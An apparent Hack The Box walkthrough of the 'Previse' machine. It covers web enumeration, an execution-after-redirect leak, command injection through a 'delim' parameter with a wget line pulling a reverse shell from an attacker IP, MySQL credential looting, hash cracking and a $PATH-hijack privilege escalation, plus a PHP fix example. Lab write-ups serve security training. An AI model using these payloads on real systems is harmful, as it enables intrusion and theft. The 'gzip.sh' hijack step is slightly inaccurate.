HTB — Previse Walkthrough
--
Enumeration
Enumerate the Previse machine with nmap using the command:
nmap -sV -sC {ip}
- -sV — probe open ports for service versions
- -sC — run the default script scan against the open ports
We see that only ports 22 and 80 are open.
22 — SSH
80 — HTTP
Let's dig in and visit the HTTP port :)
Oops, it's only a login page. The things we can do are brute force or SQL injection, which does not work at this point.
Continue enumeration and start a directory scan with ffuf.
ffuf -c -w /usr/share/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -u http://10.10.11.104/FUZZ
- -c — colored output for status codes
- -w — wordlist path
- -u — target URL (FUZZ marks the position to fuzz)
The result shows that there is no interesting web page. Let's run the directory enumeration again with the .php extension.
ffuf -c -w /usr/share/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -u http://10.10.11.104/FUZZ.php
At this point we see something interesting.
There are tons of pages which should be exploitable.
The most interesting page is nav.php. Let's visit it and see the result.
We see a result like this, but what's next? We cannot access any of these links because they redirect us to the login page: the response is a 302 status code, which is a redirect.
Let's use curl against the accounts.php page:
curl -i -X GET http://10.10.11.104/accounts.php
- -i — include the response headers in the output
- -X GET — send a GET request
Boom! We got the source of the accounts.php page even though the server answered with a 302. Now let's dig in and see what is in it.
We notice that there is a typical registration form with the fields username, password and confirm password.
What should we do next? We can send a POST request with curl to create a user and then log in with our own user.
The command looks like this:
curl -X POST -d "username=someone&password=12345678&confirm=12345678" http://10.10.11.104/accounts.php
- -X POST — send a POST request
- -d — send the form parameters username, password and confirm (password confirmation)
After this command we can log in to the website with username someone and password 12345678.
we are in :)
Now we have to enumerate the website. The most interesting page is files.php, but unfortunately we do not have access to open an uploaded shell; the only permission we have is to download the SITEBACKUP.zip file.
Let's download it and dig into that file.
We got the source code of the website's pages. We have to dig into them, and after some research we find logs.php, which contains interesting code. It looks like this:
What does it say? It says that if we are logged in and send a POST request with the parameter delim, it will pass that parameter to the exec function, which executes a command.
Let's see where on the website the delim parameter is sent.
It is file_logs.php, where we can choose comma, space or tab as the value of the delim parameter.
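The two server-side mistakes this walkthrough depends on, the 302 from accounts.php that still returns the page body and the delim value that reaches exec, reconstructed beside a hardened version. This is an added example, not code from the machine or from the walkthrough; the session key, the interpreter path and the exported script's path are assumptions.

```php
<?php
// Added example: reconstruction of the two bugs described above, beside a fix.
// Assumed names: $_SESSION['user'] as the login flag, /usr/bin/python as the
// interpreter, /path/to/log_export.py as a placeholder for the script logs.php runs.
session_start();

// --- Vulnerable pattern (reconstructed from the walkthrough's description) ---
// 1. header('Location: ...') without exit: the 302 is sent, but the script keeps
//    running and the page body is still returned, which is why curl -i shows the
//    accounts.php form to an unauthenticated client.
// 2. $_POST['delim'] is pasted straight into the exec() command line, so a value
//    such as "space; wget ..." runs as a second shell command.
function vulnerable_handler(): void {
    if (!isset($_SESSION['user'])) {
        header('Location: login.php');   // missing exit;
    }
    exec("/usr/bin/python /path/to/log_export.py {$_POST['delim']}", $out);
    echo implode("\n", $out);
}

// --- Hardened form ---
// Only the three delimiter names the form offers are accepted, and the value is
// still quoted with escapeshellarg() so it can never become shell syntax.
const ALLOWED_DELIMS = ['comma', 'space', 'tab'];

function validate_delim($name): ?string {
    return (is_string($name) && in_array($name, ALLOWED_DELIMS, true)) ? $name : null;
}

function hardened_handler(): void {
    if (!isset($_SESSION['user'])) {
        header('Location: login.php', true, 302);
        exit;                            // nothing below is ever sent
    }
    $delim = validate_delim($_POST['delim'] ?? null);
    if ($delim === null) {
        http_response_code(400);
        exit('invalid delimiter');
    }
    $cmd = '/usr/bin/python /path/to/log_export.py ' . escapeshellarg($delim);
    exec($cmd, $out, $rc);
    if ($rc !== 0) {
        http_response_code(500);
        exit('log export failed');
    }
    header('Content-Type: text/plain');
    echo implode("\n", $out);
}

hardened_handler();
```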
Now we can exploit it by sending the delim parameter together with our reverse shell.
First we have to grab our session cookie, and then send POST requests via curl against logs.php, where the exec call lives.
Download the PHP reverse shell from https://github.com/pentestmonkey/php-reverse-shell/blob/master/php-reverse-shell.php and change the IP and PORT!
Now let's upload our reverse shell to the website via curl.
Start a Python server:
Then use the curl command:
curl -X POST -b "PHPSESSID=3g4cpjgge5qo15u9obnfafpd9j" -d 'delim=space; wget http://10.10.16.19/php_reverse.php' http://10.10.11.104/logs.php
- -b — PHP session cookie; make sure to use your own session
- -d — send POST data with the delim parameter
And we will have successfully uploaded our PHP reverse shell to the website.
Let's visit our payload. In my case it is http://10.10.11.104/php_reverse.php.
Before visiting that URL, start an nc listener:
The moment we access the URL mentioned above, we get access to the server.
Congratulations :)) we are in, but it isn't the end. We don't have access to user.txt, which is stored in the m4lwhere home folder.
First we have to upgrade our shell to a tty with the command:
python3 -c 'import pty; pty.spawn("/bin/bash")'
Next, search the /var/www/html directory. Open the config.php file, where the MySQL credentials are stored.
After digging into MySQL, we will see the accounts table, which contains the hashed password of the m4lwhere user: $1$🧂llol$DQpmdvnb7EeuO6UaqRItf. (the trailing dot is part of the hash)
Crack that hashed password with hashcat:
hashcat -a 0 -m 500 '$1$🧂llol$DQpmdvnb7EeuO6UaqRItf.' /usr/share/wordlists/rockyou.txt
- -a 0 — straight (wordlist) attack mode
- -m 500 — hash mode 500, md5crypt ($1$)
Congratulations, we get the m4lwhere user's password.
Log in as m4lwhere and get user.txt :)
Privilege Escalation
Check our sudo privileges with sudo -l.
It says that we have sudo access to /opt/scripts/access_backup.sh.
Let's dig into that file. We will see that the gzip command is called by name rather than by absolute path, which is exploitable through $PATH.
Create an executable reverse shell file in the /tmp directory and name it gzip.sh. Change the $PATH variable with the command export PATH=/tmp:$PATH
Then, when we run sudo /opt/scripts/access_backup.sh, we get root access.
Enjoy :)